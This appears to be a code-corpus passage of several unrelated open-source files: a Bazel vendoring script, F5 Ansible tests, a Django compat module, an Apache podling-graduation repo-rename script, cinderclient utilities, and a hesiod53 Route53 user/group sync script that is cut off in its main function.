class ClientServerContextManagerTests(ClientServerContextManager,
unittest.TestCase):
pass
|
gpl-3.0
|
douglas-reid/mixer
|
bin/bazel_to_go.py
|
3
|
5775
|
#!/usr/bin/env python
#
# Makes a bazel workspace play nicely with standard go tools
# go build
# go test
# should work after this
#
# It does so by making symlinks from WORKSPACE/vendor to the bazel
# sandbox dirs
#
import glob
import os
import ast
from urlparse import urlparse
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
KEYS = set(["importpath", "remote", "name"])
def keywords(stmt):
kw = {k.arg: k.value.s for k in stmt.keywords if k.arg in KEYS}
path = kw.get("importpath", kw.get("remote"))
u = urlparse(path)
return u.netloc + u.path, kw["name"]
pathmap = {
"github.com/istio/api": "istio.io/api"
}
known_repos = {
"org_golang_google": "google.golang.org",
"com_github": "github.com",
"org_golang": "golang.org",
"in_gopkg": "gopkg.in"
}
# gopkg packages are of the form gopkg.in/yaml.v2, encoded as in_gopkg_yaml_v2.
# com_github_hashicorp_go_multierror --> github.com/hashicorp/go_multierror
def repos(name):
for r, m in known_repos.items():
if name.startswith(r):
rname = name[(len(r)+1):]
fp, _, rest = rname.partition('_')
if r == 'in_gopkg':
return m + "/" + fp + "." + rest
return m + "/" + fp + "/" + rest
# If we need to support more bazel functions
# add them here
class WORKSPACE(object):
def __init__(self, external, genfiles, vendor):
self.external = external
self.genfiles = genfiles
self.vendor = vendor
# All functions should return a tuple
# link target, source
# target should exist
def new_go_repository(self, name, path):
return ((self.external + "/" + name, self.vendor + "/" + path))
def new_git_repository(self, name, path):
return((self.genfiles + "/" + name, self.vendor + "/" + path))
def new_git_or_local_repository(self, name, path):
return self.new_git_repository(name, path)
def process(fl, external, genfiles, vendor):
src = open(fl).read()
tree = ast.parse(src, fl)
lst = []
wksp = WORKSPACE(external, genfiles, vendor)
for stmt in ast.walk(tree):
stmttype = type(stmt)
if stmttype == ast.Call:
fn = getattr(wksp, stmt.func.id, "")
if not callable(fn):
continue
path, name = keywords(stmt)
if path.endswith(".git"):
path = path[:-4]
path = pathmap.get(path, path)
tup = fn(name, path)
lst.append(tup)
return lst
def makelink(target, linksrc):
# make a symlink from vendor/path --> target
try:
os.makedirs(os.path.dirname(linksrc))
except Exception as e1:
if 'File exists:' not in str(e1):
print type(e1), e1
try:
os.remove(linksrc)
except Exception as e1:
if 'Is a directory' in str(e1):
return
if 'No such file or directory' not in str(e1):
print type(e1), e1
if not os.path.exists(target):
print target, "Does not exist"
return
os.symlink(target, linksrc)
# print "Linked ", linksrc, '-->', target
def bazel_to_vendor(WKSPC):
WKSPC = os.path.abspath(WKSPC)
workspace = WKSPC + "/WORKSPACE"
if not os.path.isfile(workspace):
print "WORKSPACE file not found in " + WKSPC
print "prog BAZEL_WORKSPACE_DIR"
return -1
lf = os.readlink(WKSPC + "/bazel-mixer")
EXEC_ROOT = os.path.dirname(lf)
BLD_DIR = os.path.dirname(EXEC_ROOT)
external = BLD_DIR + "/external"
vendor = WKSPC + "/vendor"
genfiles = WKSPC + "/bazel-genfiles/external/"
links = {target: linksrc for(target, linksrc) in process(workspace, external, genfiles, vendor)}
bysrc = {}
for (target, linksrc) in links.items():
makelink(target, linksrc)
#print "Vendored", linksrc, '-->', target
bysrc[linksrc] = target
# check other directories in external
# and symlink ones that were not covered thru workspace
for ext_target in get_external_links(external):
target = external + "/" + ext_target
if target in links:
continue
link = repos(ext_target)
if not link:
# print "Could not resolve", ext_target
continue
if link in pathmap:
# skip remapped deps
continue
linksrc = vendor + "/" + link
# only make this link if we have not made it above
if linksrc in bysrc:
# print "Skipping ", link
continue
makelink(target, linksrc)
# print "Vendored", linksrc, '-->', target
adapter_protos(WKSPC)
aspect_protos(WKSPC)
def get_external_links(external):
return [file for file in os.listdir(external) if os.path.isdir(external+"/"+file)]
def main(args):
WKSPC = os.getcwd()
if len(args) > 0:
WKSPC = args[0]
bazel_to_vendor(WKSPC)
def adapter_protos(WKSPC):
for adapter in os.listdir(WKSPC + "/bazel-genfiles/adapter/"):
if os.path.exists(WKSPC + "/bazel-genfiles/adapter/"+ adapter + "/config"):
for file in os.listdir(WKSPC + "/bazel-genfiles/adapter/" + adapter + "/config"):
if file.endswith(".pb.go"):
makelink(WKSPC + "/bazel-genfiles/adapter/"+ adapter + "/config/" + file, WKSPC + "/adapter/" +adapter + "/config/" + file)
def aspect_protos(WKSPC):
for aspect in os.listdir(WKSPC + "/bazel-genfiles/pkg/aspect/"):
for file in os.listdir(WKSPC + "/bazel-genfiles/pkg/aspect/config"):
if file.endswith(".pb.go"):
makelink(WKSPC + "/bazel-genfiles/pkg/aspect/config/" + file, WKSPC + "/pkg/aspect/config/" + file)
if __name__ == "__main__":
import sys
sys.exit(main(sys.argv[1:]))
|
apache-2.0
|
onitake/ansible
|
test/units/modules/network/f5/test_bigip_provision.py
|
21
|
4395
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_provision import Parameters
from library.modules.bigip_provision import ModuleManager
from library.modules.bigip_provision import ArgumentSpec
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigip_provision import Parameters
from ansible.modules.network.f5.bigip_provision import ModuleManager
from ansible.modules.network.f5.bigip_provision import ArgumentSpec
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
module='gtm',
password='password',
server='localhost',
user='admin'
)
p = Parameters(params=args)
assert p.module == 'gtm'
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.patcher1 = patch('time.sleep')
self.patcher1.start()
def tearDown(self):
self.patcher1.stop()
def test_provision_one_module_default_level(self, *args):
# Configure the arguments that would be sent to the Ansible module
set_module_args(dict(
module='gtm',
password='password',
server='localhost',
user='admin'
))
# Configure the parameters that would be returned by querying the
# remote device
current = Parameters(
dict(
module='gtm',
level='none'
)
)
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
mm = ModuleManager(module=module)
# Override methods to force specific logic in the module to happen
mm.update_on_device = Mock(return_value=True)
mm.read_current_from_device = Mock(return_value=current)
mm.reboot_device = Mock(return_value=True)
mm.save_on_device = Mock(return_value=True)
# this forced sleeping can cause these tests to take 15
# or more seconds to run. This is deliberate.
mm._is_mprov_running_on_device = Mock(side_effect=[True, False, False, False, False])
results = mm.exec_module()
assert results['changed'] is True
assert results['level'] == 'nominal'
def test_provision_all_modules(self, *args):
modules = [
'afm', 'am', 'sam', 'asm', 'avr', 'fps',
'gtm', 'lc', 'ltm', 'pem', 'swg', 'ilx',
'apm',
]
for module in modules:
# Configure the arguments that would be sent to the Ansible module
set_module_args(dict(
module=module,
password='password',
server='localhost',
user='admin'
))
with patch('ansible.module_utils.basic.AnsibleModule.fail_json') as mo:
AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
)
mo.assert_not_called()
|
gpl-3.0
|
tangentlabs/django-fancypages
|
fancypages/compat.py
|
1
|
1314
|
# -*- coding: utf-8 -*-
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
_user_model = None
try:
from django.utils.module_loading import import_string
except ImportError:
from django.utils.module_loading import import_by_path as import_string # noqa
def get_user_model():
"""
    Get the Django user model class in a way that is backwards compatible
    with older Django versions that don't provide this functionality. The
    result is cached after the first call.
Returns the user model class.
"""
global _user_model
if not _user_model:
# we have to import the user model here because we can't be sure
# that the app providing the user model is fully loaded.
try:
from django.contrib.auth import get_user_model
except ImportError:
from django.contrib.auth.models import User
else:
User = get_user_model()
_user_model = User
return _user_model
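# Illustrative usage (a sketch only):
#
#     User = get_user_model()
#     users = User.objects.all()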
AUTH_USER_MODEL = getattr(settings, 'AUTH_USER_MODEL', 'auth.User')
try:
AUTH_USER_MODEL_NAME = AUTH_USER_MODEL.split('.')[1]
except IndexError:
raise ImproperlyConfigured(
"invalid user model '{}' specified has to be in the format "
"'app_label.model_name'.".format(AUTH_USER_MODEL))
|
bsd-3-clause
|
apache/infrastructure-puppet
|
modules/gitbox/files/bin/graduate-podling.py
|
3
|
5934
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a migration script for git repositories on gitbox, git-wip and git.a.o.
When run on git-wip or gitbox, it:
- Renames the repositories locally
- Updates git origins
- Updates mailing list settings
 - Renames the repositories on GitHub
When run on git.a.o, it:
- Renames the repository
- Updates SVN remote if this is a SVN mirror
Usage: graduate-podling.py $project, e.g.: graduate-podling.py ponymail
MUST BE RUN AS www-data OR git USER!
"""
import os
import sys
import re
import requests
import json
import git
import ConfigParser
import pwd
REPO_ROOT = "/x1/repos/asf" # Root dir for all repos
CONFIG_FILE = "/x1/gitbox/matt/tools/grouper.cfg" # config file with GH token in it
IS_MIRROR = False # Set to True on git.a.o to avoid a GitHub call!
CONFIG = ConfigParser.ConfigParser()
TOKEN = None
if not IS_MIRROR:
CONFIG.read(CONFIG_FILE) # Shhhh
TOKEN = CONFIG.get('github', 'token')
def rename_github_repo(token, old, new):
"""
Renames a repository on GitHub by sending a PATCH request.
"""
# Cut away the .git ending if it's there
old = old.replace(".git", "")
new = new.replace(".git", "")
# API URL for patching the name
url = "https://api.github.com/repos/apache/%s" % old
# Headers - json payload + creds
headers = {
'content-type': 'application/json',
}
# Construct payload
payload = json.dumps({
'name': new
})
# Run the request
print(" - Changing repository from %s to %s on GitHub..." % (old, new))
r = requests.patch(url, headers = headers, data = payload, auth = (token, 'x-oauth-basic'))
if r.status_code == requests.codes.ok:
print(" - Repository name changed!")
else:
print(" - Something went wrong :(")
print(r.text)
print("Something did not work here, aborting process!!")
print("Fix the issue and run the tool again.")
sys.exit(-1)
def rename_local_repo(old, new, project):
"""
Renames local repositories:
- Rename the git dir
- Change remote origin (svn or git)
- Change commit notification ML
- Change PR notification ML
"""
# First, rename the dir on the box. Fall flat on our behind if this fails.
print(" - Renaming gitbox repo from %s/%s to %s/%s..." % (REPO_ROOT, old, REPO_ROOT, new))
os.rename("%s/%s" % (REPO_ROOT, old), "%s/%s" % (REPO_ROOT, new))
# Change git config options
gcpath = "%s/%s/config" % (REPO_ROOT, new)
if not os.path.exists(gcpath):
gcpath = "%s/%s/.git/config" % (REPO_ROOT, new)
gconf = git.GitConfigParser(gcpath, read_only = False)
# Remote origin on GitHub
if gconf.has_section('remote "origin"'):
print(" - Setting remote...")
gconf.set('remote "origin"', 'url', "https://github.com/apache/%s" % new)
# Remote copy on GitHub
if gconf.has_section('remote "github-copy"'):
print(" - Setting remote...")
gconf.set('remote "github-copy"', 'url', "https://github.com/apache/%s" % new)
# Remote SVN origin?
if gconf.has_section('svn-remote "svn"'):
svnremote = gconf.get('svn-remote "svn"', 'url')
newsvn = svnremote.replace("/incubator/", "/")
print(" - Setting SVN remote from %s to %s...")
gconf.set('svn-remote "svn"', 'url', newsvn)
# ML notification targets for commits and PRs
print(" - Changing notification options..")
if gconf.has_option('hooks.asfgit', 'recips'):
ml = gconf.get('hooks.asfgit', 'recips')
ml = re.sub(r"incubator\.", "", ml)
print(" - Changing commit ML to %s" % ml)
gconf.set('hooks.asfgit', 'recips', ml)
if gconf.has_section('apache') and gconf.has_option('apache', 'dev'):
ml = gconf.get('apache', 'dev')
ml = re.sub(r"incubator\.", "", ml)
print(" - Changing PR notification ML to %s" % ml)
gconf.set('apache', 'dev', ml)
print(" - Done!")
# Demand being run by www-data or git
me = pwd.getpwuid(os.getuid()).pw_name
if me != "www-data" and me != "git":
print("You must run this as either www-data (on gitbox/git-wip) or git (on git.a.o)!")
print("You are running as: %s" % me)
sys.exit(-1)
# Expect one project name passed on, and only one!
if len(sys.argv) == 2:
PROJECT = sys.argv[1]
print("Graduating %s..." % PROJECT)
if os.path.isdir(REPO_ROOT):
pr = 0
for repo in os.listdir(REPO_ROOT):
m = re.match(r"incubator-%s(-.+)?(\.git)?$"% PROJECT, repo)
if m:
pr += 1
print("- Applying changes to %s ..." % repo)
new = repo.replace("incubator-", "")
rename_local_repo(repo, new, PROJECT)
if not IS_MIRROR:
rename_github_repo(TOKEN, repo, new)
print("All done, processed %u repositories!" % pr)
else:
print("%s does not seem to be a directory, aborting!" % REPO_ROOT)
else:
print("Usage: graduate-podling.py $podling")
print("Example: graduate-podling.py openwhisk")
|
apache-2.0
|
neumerance/deploy
|
.venv/lib/python2.7/site-packages/cinderclient/utils.py
|
3
|
9043
|
# Copyright 2013 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import re
import sys
import uuid
import six
import prettytable
from cinderclient import exceptions
from cinderclient.openstack.common import strutils
def arg(*args, **kwargs):
"""Decorator for CLI args."""
def _decorator(func):
add_arg(func, *args, **kwargs)
return func
return _decorator
def env(*vars, **kwargs):
"""
returns the first environment variable set
if none are non-empty, defaults to '' or keyword arg default
"""
for v in vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
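# Illustrative doctest-style sketch (not part of the original module);
# env() returns the first non-empty variable, else the default:
#   >>> import os
#   >>> os.environ['OS_AUTH_URL'] = 'http://keystone:5000'
#   >>> env('CINDER_URL', 'OS_AUTH_URL', default='unset')
#   'http://keystone:5000'
#   >>> env('MISSING_A', 'MISSING_B', default='unset')
#   'unset'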
def add_arg(f, *args, **kwargs):
"""Bind CLI arguments to a shell.py `do_foo` function."""
if not hasattr(f, 'arguments'):
f.arguments = []
# NOTE(sirp): avoid dups that can occur when the module is shared across
# tests.
if (args, kwargs) not in f.arguments:
# Because of the semantics of decorator composition, if we just append
# to the options list, positional options will appear to be backwards.
f.arguments.insert(0, (args, kwargs))
def add_resource_manager_extra_kwargs_hook(f, hook):
"""Adds hook to bind CLI arguments to ResourceManager calls.
The `do_foo` calls in shell.py will receive CLI args and then in turn pass
them through to the ResourceManager. Before passing through the args, the
hooks registered here will be called, giving us a chance to add extra
kwargs (taken from the command-line) to what's passed to the
ResourceManager.
"""
if not hasattr(f, 'resource_manager_kwargs_hooks'):
f.resource_manager_kwargs_hooks = []
names = [h.__name__ for h in f.resource_manager_kwargs_hooks]
if hook.__name__ not in names:
f.resource_manager_kwargs_hooks.append(hook)
def get_resource_manager_extra_kwargs(f, args, allow_conflicts=False):
"""Return extra_kwargs by calling resource manager kwargs hooks."""
hooks = getattr(f, "resource_manager_kwargs_hooks", [])
extra_kwargs = {}
for hook in hooks:
hook_name = hook.__name__
hook_kwargs = hook(args)
conflicting_keys = set(hook_kwargs.keys()) & set(extra_kwargs.keys())
if conflicting_keys and not allow_conflicts:
msg = ("Hook '%(hook_name)s' is attempting to redefine attributes "
"'%(conflicting_keys)s'" % {
'hook_name': hook_name,
'conflicting_keys': conflicting_keys
})
raise Exception(msg)
extra_kwargs.update(hook_kwargs)
return extra_kwargs
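# Hedged sketch of the hook flow (the hook and args object below are
# hypothetical, not part of this module):
#   >>> def do_create(cs, args): pass
#   >>> def tenant_hook(args): return {'tenant_id': args.tenant}
#   >>> add_resource_manager_extra_kwargs_hook(do_create, tenant_hook)
#   >>> class Args(object): tenant = 't-123'
#   >>> get_resource_manager_extra_kwargs(do_create, Args())
#   {'tenant_id': 't-123'}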
def unauthenticated(f):
"""
Adds 'unauthenticated' attribute to decorated function.
Usage:
@unauthenticated
def mymethod(f):
...
"""
f.unauthenticated = True
return f
def isunauthenticated(f):
"""
Checks whether the function is marked as not requiring authentication
via the @unauthenticated decorator. Returns True if the decorator is
set, False otherwise.
"""
return getattr(f, 'unauthenticated', False)
def service_type(stype):
"""
Adds 'service_type' attribute to decorated function.
Usage:
@service_type('volume')
def mymethod(f):
...
"""
def inner(f):
f.service_type = stype
return f
return inner
def get_service_type(f):
"""
Retrieves service type from function
"""
return getattr(f, 'service_type', None)
def pretty_choice_list(l):
return ', '.join("'%s'" % i for i in l)
def _print(pt, order):
if sys.version_info >= (3, 0):
print(pt.get_string(sortby=order))
else:
print(strutils.safe_encode(pt.get_string(sortby=order)))
def print_list(objs, fields, formatters={}, order_by=None):
mixed_case_fields = ['serverId']
pt = prettytable.PrettyTable([f for f in fields], caching=False)
pt.aligns = ['l' for f in fields]
for o in objs:
row = []
for field in fields:
if field in formatters:
row.append(formatters[field](o))
else:
if field in mixed_case_fields:
field_name = field.replace(' ', '_')
else:
field_name = field.lower().replace(' ', '_')
data = getattr(o, field_name, '')
row.append(data)
pt.add_row(row)
if order_by is None:
order_by = fields[0]
_print(pt, order_by)
def print_dict(d, property="Property"):
pt = prettytable.PrettyTable([property, 'Value'], caching=False)
pt.aligns = ['l', 'l']
[pt.add_row(list(r)) for r in six.iteritems(d)]
_print(pt, property)
def find_resource(manager, name_or_id):
"""Helper for the _find_* methods."""
# first try to get entity as integer id
try:
if isinstance(name_or_id, int) or name_or_id.isdigit():
return manager.get(int(name_or_id))
except exceptions.NotFound:
pass
if sys.version_info <= (3, 0):
name_or_id = strutils.safe_decode(name_or_id)
# now try to get entity as uuid
try:
uuid.UUID(name_or_id)
return manager.get(name_or_id)
except (ValueError, exceptions.NotFound):
pass
try:
try:
return manager.find(human_id=name_or_id)
except exceptions.NotFound:
pass
# finally try to find entity by name
try:
return manager.find(name=name_or_id)
except exceptions.NotFound:
try:
return manager.find(display_name=name_or_id)
except (UnicodeDecodeError, exceptions.NotFound):
try:
# Volumes does not have name, but display_name
return manager.find(display_name=name_or_id)
except exceptions.NotFound:
msg = "No %s with a name or ID of '%s' exists." % \
(manager.resource_class.__name__.lower(), name_or_id)
raise exceptions.CommandError(msg)
except exceptions.NoUniqueMatch:
msg = ("Multiple %s matches found for '%s', use an ID to be more"
" specific." % (manager.resource_class.__name__.lower(),
name_or_id))
raise exceptions.CommandError(msg)
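# Illustrative usage only (credentials and names are placeholders, not
# part of this module); lookups fall through integer id -> uuid -> name:
#   >>> from cinderclient import client
#   >>> cs = client.Client('1', USER, API_KEY, PROJECT_ID, AUTH_URL)
#   >>> vol = find_resource(cs.volumes, 'my-volume')   # by display name
#   >>> vol = find_resource(cs.volumes, vol.id)        # or by UUID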
def _format_servers_list_networks(server):
output = []
for (network, addresses) in list(server.networks.items()):
if len(addresses) == 0:
continue
addresses_csv = ', '.join(addresses)
group = "%s=%s" % (network, addresses_csv)
output.append(group)
return '; '.join(output)
class HookableMixin(object):
"""Mixin so classes can register and run hooks."""
_hooks_map = {}
@classmethod
def add_hook(cls, hook_type, hook_func):
if hook_type not in cls._hooks_map:
cls._hooks_map[hook_type] = []
cls._hooks_map[hook_type].append(hook_func)
@classmethod
def run_hooks(cls, hook_type, *args, **kwargs):
hook_funcs = cls._hooks_map.get(hook_type) or []
for hook_func in hook_funcs:
hook_func(*args, **kwargs)
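# Minimal sketch (hypothetical subclass and hook). Note that _hooks_map
# is a class attribute on the mixin itself, so registered hooks are
# shared by all subclasses unless a subclass shadows _hooks_map:
#   >>> class VolumeManager(HookableMixin): pass
#   >>> def log_create(*args, **kwargs): print("creating", args)
#   >>> VolumeManager.add_hook('pre-create', log_create)
#   >>> VolumeManager.run_hooks('pre-create', 'vol-1')
#   creating ('vol-1',)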
def safe_issubclass(*args):
"""Like issubclass, but will just return False if not a class."""
try:
if issubclass(*args):
return True
except TypeError:
pass
return False
def import_class(import_str):
"""Returns a class from a string including module and class."""
mod_str, _sep, class_str = import_str.rpartition('.')
__import__(mod_str)
return getattr(sys.modules[mod_str], class_str)
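# Example (stdlib only, so safe to run as-is):
#   >>> import_class('collections.OrderedDict')
#   <class 'collections.OrderedDict'>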
_slugify_strip_re = re.compile(r'[^\w\s-]')
_slugify_hyphenate_re = re.compile(r'[-\s]+')
# http://code.activestate.com/recipes/
# 577257-slugify-make-a-string-usable-in-a-url-or-filename/
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
From Django's "django/template/defaultfilters.py".
"""
import unicodedata
if not isinstance(value, six.text_type):
value = six.text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = six.text_type(_slugify_strip_re.sub('', value).strip().lower())
return _slugify_hyphenate_re.sub('-', value)
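# Example (Python 3 repr shown):
#   >>> slugify(u'Héllo  Wörld!')
#   'hello-world'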
|
apache-2.0
|
fullcontact/hesiod53
|
hesiod53/sync.py
|
1
|
11846
|
#!/usr/bin/env python
from boto.route53.record import ResourceRecordSets
from boto.route53.status import Status
import boto.route53 as r53
from collections import namedtuple
import argparse
import time
import yaml
# a DNS record for hesiod
# fqdn should include the trailing .
# value should contain the value without quotes
DNSRecord = namedtuple("DNSRecord", "fqdn value")
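# For example, a hesiod passwd record (hypothetical values):
#   DNSRecord(fqdn="alice.passwd.hesiod.example.com.",
#             value="alice:x:1000:5000:Alice A,,,,:/home/alice:/bin/bash")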
# A UNIX group
class Group(object):
def __init__(self, name, gid):
if not name:
raise Exception("Group name must be provided.")
if not gid:
raise Exception("Group ID must be provided.")
self.name = str(name)
self.gid = int(gid)
if len(self.passwd_line([]).split(":")) != 4:
raise Exception("Invalid group, contains colons: %s" % self)
def users(self, users):
r = []
for user in users:
if self in user.groups:
r.append(user)
return r
def dns_records(self, hesiod_domain, users):
records = []
passwd_line = self.passwd_line(users)
# group record
fqdn = "%s.group.%s" % (self.name, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), passwd_line))
# gid record
fqdn = "%s.gid.%s" % (self.gid, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), passwd_line))
return records
@classmethod
# returns group, usernames list
# usernames will be empty if only a partial line
def parse_passwd_line(cls, line):
parts = line.split(":")
if len(parts) != 3 and len(parts) != 4:
raise Exception("Invalid group passwd line: %s" % line)
name = parts[0]
gid = parts[2]
usernames = []
if len(parts) == 4:
usernames = parts[3].split(",")
return Group(name, gid), usernames
def passwd_line(self, users):
usernames = ",".join(sorted(map(lambda u: u.username, self.users(users))))
return "%s:x:%d:%s" % (self.name, self.gid, usernames)
def __eq__(self, other):
return self.name == other.name and self.gid == other.gid
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Group(name=%s, gid=%s)" % (self.name, self.gid)
# A UNIX user
class User(object):
def __init__(self, name, username, uid, groups, ssh_keys, homedir=None, shell="/bin/bash"):
self.name = str(name)
self.username = str(username)
self.uid = int(uid)
self.groups = groups
self.ssh_keys = list(ssh_keys)
if not homedir:
homedir = "/home/%s" % self.username
self.homedir = str(homedir)
self.shell = str(shell)
if len(self.passwd_line().split(":")) != 7:
raise Exception("Invalid user, contains colons: %s" % self)
@classmethod
# returns user, primary group id
def parse_passwd_line(cls, line):
line = line.replace('"', '')
parts = line.split(":")
if len(parts) != 7:
raise Exception("Invalid user passwd line: %s" % line)
username, x, uid, group, gecos, homedir, shell = parts
name = gecos.split(",")[0]
group = int(group)
return User(name, username, uid, [], [], homedir, shell), group
def dns_records(self, hesiod_domain):
records = []
# user record
fqdn = "%s.passwd.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), self.passwd_line()))
# uid record
fqdn = "%s.uid.%s" % (self.uid, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), self.passwd_line()))
# group list record
gl = []
for group in sorted(self.groups, key=lambda g: g.gid):
gl.append("%s:%s" % (group.name, group.gid))
fqdn = "%s.grplist.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(fqdn.lower(), ":".join(gl)))
# ssh records
if self.ssh_keys:
ssh_keys_count_fqdn = "%s.count.ssh.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(ssh_keys_count_fqdn.lower(), str(len(self.ssh_keys))))
# Need to keep this around for backwards compatibility when only one ssh key worked
legacy_ssh_key_fqdn = "%s.ssh.%s" % (self.username, hesiod_domain)
records.append(DNSRecord(legacy_ssh_key_fqdn.lower(), self.ssh_keys[0]))
for _id, ssh_key in enumerate(self.ssh_keys):
ssh_key_fqdn = "%s.%s.ssh.%s" % (self.username, _id, hesiod_domain)
records.append(DNSRecord(ssh_key_fqdn.lower(), ssh_key))
return records
def passwd_line(self):
gid = ""
if self.groups:
gid = str(self.groups[0].gid)
return "%s:x:%d:%s:%s:%s:%s" % \
(self.username, self.uid, gid, self.gecos(), self.homedir, self.shell)
def gecos(self):
return "%s,,,," % self.name
def __eq__(self, other):
return self.passwd_line() == other.passwd_line()
def __ne__(self, other):
return not self == other
def __repr__(self):
return ("User(name=%s, username=%s, uid=%s, groups=%s, ssh_keys=%s, " +
"homedir=%s, shell=%s)") % \
(self.name, self.username, self.uid, self.groups,
self.ssh_keys, self.homedir, self.shell)
# syncs users and groups to route53
# users is a list of users
# groups is a list of groups
# route53_zone - the hosted zone in Route53 to modify, e.g. example.com
# hesiod_domain - the zone with hesiod information, e.g. hesiod.example.com
def sync(users, groups, route53_zone, hesiod_domain, dry_run):
conn = r53.connect_to_region('us-east-1')
record_type = "TXT"
ttl = "60"
# suffix of . on zone if not supplied
if route53_zone[-1:] != '.':
route53_zone += "."
if hesiod_domain[-1:] != '.':
hesiod_domain += "."
# get existing hosted zones
zones = {}
results = conn.get_all_hosted_zones()
for r53zone in results['ListHostedZonesResponse']['HostedZones']:
zone_id = r53zone['Id'].replace('/hostedzone/', '')
zones[r53zone['Name']] = zone_id
# ensure requested zone is hosted by route53
if not route53_zone in zones:
raise Exception("Zone %s does not exist in Route53" % route53_zone)
sets = conn.get_all_rrsets(zones[route53_zone])
# existing records
existing_records = set()
for rset in sets:
if rset.type == record_type:
if rset.name.endswith("group." + hesiod_domain) or \
rset.name.endswith("gid." + hesiod_domain) or \
rset.name.endswith("passwd." + hesiod_domain) or \
rset.name.endswith("uid." + hesiod_domain) or \
rset.name.endswith("grplist." + hesiod_domain) or \
rset.name.endswith("ssh." + hesiod_domain):
value = "".join(rset.resource_records).replace('"', '')
existing_records.add(DNSRecord(str(rset.name), str(value)))
# new records
new_records = set()
for group in groups:
for record in group.dns_records(hesiod_domain, users):
new_records.add(record)
for user in users:
for record in user.dns_records(hesiod_domain):
new_records.add(record)
to_remove = existing_records - new_records
to_add = new_records - existing_records
if to_remove:
print "Deleting:"
for r in sorted(to_remove):
print r
print
else:
print "Nothing to delete."
if to_add:
print "Adding:"
for r in sorted(to_add):
print r
print
else:
print "Nothing to add."
if dry_run:
print "Dry run mode. Stopping."
return
# stop if nothing to do
if not to_remove and not to_add:
return
changes = ResourceRecordSets(conn, zones[route53_zone])
for record in to_remove:
removal = changes.add_change("DELETE", record.fqdn, record_type, ttl)
removal.add_value(txt_value(record.value))
for record in to_add:
addition = changes.add_change("CREATE", record.fqdn, record_type, ttl)
addition.add_value(txt_value(record.value))
try:
result = changes.commit()
status = Status(conn, result["ChangeResourceRecordSetsResponse"]["ChangeInfo"])
except r53.exception.DNSServerError, e:
raise Exception("Could not update DNS records.", e)
while status.status == "PENDING":
print "Waiting for Route53 to propagate changes."
time.sleep(10)
print status.update()
# DNS text values are limited to chunks of 255, but multiple chunks are concatenated
# Amazon handles this by requiring you to add quotation marks around each chunk
def txt_value(value):
first = value[:255]
rest = value[255:]
if rest:
rest_value = txt_value(rest)
else:
rest_value = ""
return '"%s"%s' % (first, rest_value)
def load_data(filename):
with open(filename, "r") as f:
contents = yaml.load(f, Loader=yaml.FullLoader)
route53_zone = contents["route53_zone"]
hesiod_domain = contents["hesiod_domain"]
# all groups and users
groups_idx = {}
users_idx = {}
groups = []
users = []
for g in contents["groups"]:
group = Group(**g)
if group.name in groups_idx:
raise Exception("Group name is not unique: %s" % group.name)
if group.gid in groups_idx:
raise Exception("Group ID is not unique: %s" % group.gid)
groups_idx[group.name] = group
groups_idx[group.gid] = group
groups.append(group)
for u in contents["users"]:
groups_this = []
if u["groups"]:
for g in u["groups"]:
group = groups_idx[g]
if not group:
raise Exception("No such group: %s" % g)
groups_this.append(group)
u["groups"] = groups_this
user = User(**u)
if len(user.groups) == 0:
raise Exception("At least one group required for user %s" % \
user.username)
if user.username in users_idx:
raise Exception("Username is not unique: %s" % user.username)
if user.uid in users_idx:
raise Exception("User ID is not unique: %s" % user.uid)
users_idx[user.username] = user
users_idx[user.uid] = user
users.append(user)
return users, groups, route53_zone, hesiod_domain
def main():
parser = argparse.ArgumentParser(
description="Synchronize a user database with Route53 for Hesiod.",
